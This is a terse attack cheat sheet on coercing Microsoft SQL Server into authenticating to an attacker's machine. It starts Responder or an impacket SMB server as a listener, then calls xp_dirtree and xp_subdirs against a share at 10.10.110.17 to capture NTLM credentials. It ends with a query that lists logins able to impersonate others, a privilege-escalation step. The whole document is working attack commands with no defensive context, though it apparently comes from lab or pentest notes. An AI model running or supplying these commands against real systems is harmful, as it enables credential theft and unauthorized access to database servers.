On attacker:
responder -I tun0
Or with impacket:
impacket-smbserver share ./ -smb2support
With XP_DIRTREE
EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'
With XP_SUBDIR:
EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'